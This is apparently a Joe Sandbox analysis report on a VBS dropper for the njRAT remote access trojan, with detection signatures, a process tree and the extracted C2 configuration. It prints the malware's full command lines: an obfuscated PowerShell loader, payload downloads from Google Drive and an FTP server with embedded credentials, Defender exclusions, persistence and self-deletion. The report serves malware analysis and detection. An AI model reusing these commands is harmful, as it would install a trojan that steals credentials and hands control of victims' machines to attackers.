Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Oficio notificacion multas y sanciones.vbs

Overview

General Information

Sample name:Oficio notificacion multas y sanciones.vbs
Analysis ID:1517277
MD5:5d0e059a9d852fbaa853170862b948f7
SHA1:89c0faf4ba6531b3e9c5550f53280e02492c770d
SHA256:838e276f65a1dcdf9fd0292c3c7cd8b6c3f6c2ed940adcc663d68dd84a40e2c4
Tags:njratRATvbsuser-abuse_ch
Infos:

Detection

Njrat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Copy file to startup via Powershell
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected Njrat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4956 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c???BK???Dg???Nw???1???DE???MgBv???HI???c???By???GU???c???Bv???Gw???ZQB2???GU???Z??????n???Cw???KQ???p???Dk???N??????s???DY???MQ???x???Cw???Nw???5???Cw???N??????x???DE???L??????4???Dk???L??????4???DE???MQ???s???Dc???M??????x???Cw???OQ???5???Cw???NQ???x???DE???L??????x???D??????MQ???s???D??????M??????x???Cg???XQBd???Fs???cgBh???Gg???YwBb???C??????bgBp???G8???ag???t???Cg???K???Bs???GE???aQB0???G4???ZQBk???GU???cgBD???Gs???cgBv???Hc???d???Bl???E4???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???C??????d???Bj???GU???agBi???G8???LQB3???GU???bg???g???D0???I???Bz???Gw???YQBp???HQ???bgBl???GQ???ZQBy???EM???LgB6???HQ???e???Bo???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???OwBn???FM???egBD???EI???b??????k???Ds???Mg???x???HM???b???BU???Do???OgBd???GU???c???B5???FQ???b???Bv???GM???bwB0???G8???cgBQ???Hk???d???Bp???HI???dQBj???GU???Uw???u???HQ???ZQBO???C4???bQBl???HQ???cwB5???FM???Ww???g???D0???I???Bs???G8???YwBv???HQ???bwBy???F??????eQB0???Gk???cgB1???GM???ZQBT???Do???OgBd???HI???ZQBn???GE???bgBh???E0???d???Bu???Gk???bwBQ???GU???YwBp???HY???cgBl???FM???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???Fs???OwB9???GU???dQBy???HQ???J???B7???C??????PQ???g???Gs???YwBh???GI???b???Bs???GE???QwBu???G8???aQB0???GE???Z???Bp???Gw???YQBW???GU???d???Bh???GM???aQBm???Gk???d???By???GU???QwBy???GU???dgBy???GU???Uw???6???Do???XQBy???GU???ZwBh???G4???YQBN???HQ???bgBp???G8???U???Bl???GM???aQB2???HI???ZQBT???C4???d???Bl???E4???LgBt???GU???d???Bz???Hk???UwBb???Hs???I???Bl???HM???b???Bl???H0???I???Bm???C8???I??????w???C??????d??????v???C??????cg???v???C??????ZQB4???GU???LgBu???Hc???bwBk???HQ???dQBo???HM???I??????7???Cc???M??????4???DE???I???Bw???GU???ZQBs???HM???Jw???g???GQ???bgBh???G0???bQBv???GM???LQ???g???GU???e???Bl???C4???b???Bs???GU???a???Bz???HI???ZQB3???G8???c??????7???C??????ZQBj???HI???bwBm???C0???I??????p???C??????JwBw???HU???d???By???GE???d???BT???Fw???cwBt???GE???cgBn???G8???cgBQ???Fw???dQBu???GU???TQ???g???HQ???cgBh???HQ???UwBc???HM???dwBv???GQ???bgBp???Fc???X???B0???GY???bwBz???G8???cgBj???Gk???TQBc???Gc???bgBp???G0???YQBv???FI???X???Bh???HQ???YQBE???H??????c???BB???Fw???Jw???g???Cs???I???Ba???Es???bgBZ???E0???J??????g???Cg???I???Bu???G8???aQB0???GE???bgBp???HQ???cwBl???EQ???LQ???g???Cc???JQBJ???Gg???cQBS???Fg???JQ???n???C??????bQBl???HQ???SQ???t???Hk???c???Bv???EM???I??????7???C??????d???By???GE???d???Bz???GU???cgBv???G4???Lw???g???HQ???ZQBp???HU???cQ???v???C??????RwBj???Fc???aQBS???C??????ZQB4???GU???LgBh???HM???dQB3???C??????ZQB4???GU???LgBs???Gw???ZQBo???HM???cgBl???Hc???bwBw???C??????Ow???p???Cc???dQBz???G0???LgBu???Gk???dwBw???FU???X??????n???C??????Kw???g???E4???SgBU???Hg???R??????k???Cg???I??????9???C??????RwBj???Fc???aQBS???Ds???KQ???g???GU???bQBh???E4???cgBl???HM???VQ???6???Do???XQB0???G4???ZQBt???G4???bwBy???Gk???dgBu???EU???Ww???g???Cs???I??????n???Fw???cwBy???GU???cwBV???Fw???OgBD???Cc???K??????g???D0???I???Ba???Es???bgBZ???E0???J??????7???Ck???JwB1???HM???bQ???u???G4???aQB3???H??????VQBc???Cc???I??????r???C??????TgBK???FQ???e???BE???CQ???I??????s???EI???SwBM???FI???VQ???k???Cg???ZQBs???Gk???RgBk???GE???bwBs???G4???dwBv???EQ???LgBu???Eo???eQBW???Go???J??????7???Dg???RgBU???FU???Og???6???F0???ZwBu???Gk???Z???Bv???GM???bgBF???C4???d???B4???GU???V??????u???G0???ZQB0???HM???eQBT???Fs???I??????9???C??????ZwBu???Gk???Z???Bv???GM???bgBF???C4???bgBK???Hk???VgBq???CQ???Ow???p???HQ???bgBl???Gk???b???BD???GI???ZQBX???C4???d???Bl???E4???I???B0???GM???ZQBq???GI???Tw???t???Hc???ZQBO???Cg???I??????9???C??????bgBK???Hk???VgBq???CQ???OwB9???Ds???I??????p???Cc???d???BP???Ew???YwBf???Es???YQ???z???Fo???ZgBv???Fg???MgBK???Eo???cgBW???Gg???bQBW???Dk???YwBt???Dk???W???Bz???HU???W???Bt???Go???MQBn???DE???Jw???g???Cs???I???Bv???Hg???SwBV???Gc???J??????o???C??????PQ???g???G8???e???BL???FU???Zw???k???Hs???I???Bl???HM???b???Bl???H0???Ow???g???Ck???Jw???y???DQ???dQBY???Eo???V???Bx???GE???bQBn???Hk???TQB0???EY???egBh???Gs???U???BS???DE???cQBf???Ek???dgBH???Gk???W???BO???GQ???cQBh???E4???MQ???n???C??????Kw???g???G8???e???BL???FU???Zw???k???CgAIAA9ACAAbwB4AEsAVQBnACQAewAgACkAIAB1AE4AQwBWAHEAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHUATgBDAFYAcQAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABvAHgASwBV???GcAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABOAEoAVAB4AEQAJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAATgBKAFQAeABEACQAewAgACkAIABQAGIAbgBFAFoAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABQAGIAbgBFAFoAJAAgADsA';$kahlN = $qKKzc.replace('???' , 'A') ;$vQpeD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs');powershell $vQpeD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6524 cmdline: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6388 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 3116 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 4836 cmdline: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5436 cmdline: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 5792 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegAsm.exe (PID: 7212 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
            • cmd.exe (PID: 8148 cmdline: cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5552 cmdline: cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 7368 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7428 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cmd.exe (PID: 7612 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7656 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 7788 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
NjRATRedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat
{"Host": "notificadoresrma.duckdns.org", "Port": "2054", "Campaign ID": "NYAN CAT", "Network Seprator": "@!#&^%$", "Registry": "a388ab2ca3be4"}
SourceRuleDescriptionAuthorStrings
00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
    0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
      0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
        00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
          00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
            Click to see the 18 entries
            SourceRuleDescriptionAuthorStrings
            23.2.powershell.exe.20958f44b38.1.unpackJoeSecurity_NjratYara detected NjratJoe Security
              23.2.powershell.exe.20958f44b38.1.raw.unpackJoeSecurity_NjratYara detected NjratJoe Security
                20.2.RegAsm.exe.400000.0.unpackJoeSecurity_NjratYara detected NjratJoe Security
                  12.2.powershell.exe.20a2a7dbe00.1.unpackJoeSecurity_NjratYara detected NjratJoe Security
                    18.2.powershell.exe.2078fd84ec0.0.unpackJoeSecurity_NjratYara detected NjratJoe Security
                      Click to see the 11 entries
                      SourceRuleDescriptionAuthorStrings
                      amsi64_1088.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio 